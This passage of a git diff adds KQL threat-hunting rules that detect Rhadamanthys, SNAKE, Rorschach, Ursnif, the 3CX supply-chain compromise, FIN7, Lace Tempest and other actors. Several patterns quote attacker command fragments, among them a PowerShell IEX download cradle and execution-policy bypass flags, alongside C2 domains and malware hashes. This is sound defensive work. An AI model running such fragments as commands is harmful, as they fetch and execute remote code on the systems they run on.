+// Level: medium
+// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
new file mode 100644
index 00000000..667ac9f1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
@@ -0,0 +1,12 @@
+// Title: Rorschach Ransomware Execution Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-04
+// Level: critical
+// Description: Detects Rorschach ransomware execution activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
new file mode 100644
index 00000000..1df0b250
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
@@ -0,0 +1,12 @@
+// Title: Potential Encrypted Registry Blob Related To SNAKE Malware
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: medium
+// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+//   - Some additional tuning might be required to tune out legitimate processes that write to this key by default
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
new file mode 100644
index 00000000..9791ec11
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation Binary Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
new file mode 100644
index 00000000..821c449b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation CLI Arguments Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
new file mode 100644
index 00000000..7e3d7d4b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential SNAKE Malware Persistence Service Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
new file mode 100644
index 00000000..76302e5e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware Covert Store Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: high
+// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
new file mode 100644
index 00000000..5ef1bece
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Installer Name Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: low
+// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.
+
+DeviceFileEvents
+| where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
new file mode 100644
index 00000000..64b7109e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Kernel Driver File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: critical
+// Description: Detects SNAKE malware kernel driver file indicator
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
new file mode 100644
index 00000000..cc0b6221
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware WerFault Persistence File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: high
+// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
new file mode 100644
index 00000000..4f32f675
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
@@ -0,0 +1,12 @@
+// Title: Ursnif Redirection Of Discovery Commands
+// Author: @kostastsale
+// Date: 2023-07-16
+// Level: high
+// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
new file mode 100644
index 00000000..1f4c3a8a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
@@ -0,0 +1,12 @@
+// Title: Malicious DLL Load By Compromised 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-31
+// Level: critical
+// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
new file mode 100644
index 00000000..265d4327
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceNetworkEvents
+| where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
new file mode 100644
index 00000000..ba655e8f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects execution of known compromised version of 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+// False Positives:
+//   - Legitimate usage of 3CXDesktopApp
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith "6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
new file mode 100644
index 00000000..a160a293
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Compromised 3CXDesktopApp Update Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
new file mode 100644
index 00000000..29aeaaab
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Suspicious Child Process Of 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
new file mode 100644
index 00000000..3df96209
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
@@ -0,0 +1,10 @@
+// Title: DLL Names Used By SVR For GraphicalProton Backdoor
+// Author: CISA
+// Date: 2023-12-18
+// Level: medium
+// Description: Hunts known SVR-specific DLL names.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
new file mode 100644
index 00000000..8a21aa8a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT DLL Sideloading Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..2ba18f53
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Diamond Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..c360500b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT Process Activity Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects process creation activity indicators related to Diamond Sleet APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
new file mode 100644
index 00000000..0692f2c2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
@@ -0,0 +1,10 @@
+// Title: Diamond Sleet APT Scheduled Task Creation - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
new file mode 100644
index 00000000..2d0933e1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
new file mode 100644
index 00000000..0c7fb559
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
@@ -0,0 +1,10 @@
+// Title: Potential APT FIN7 Related PowerShell Script Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
new file mode 100644
index 00000000..0f704d81
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Cobalt Strike Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
new file mode 100644
index 00000000..7b577400
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
new file mode 100644
index 00000000..4d901408
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Malware Loader Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
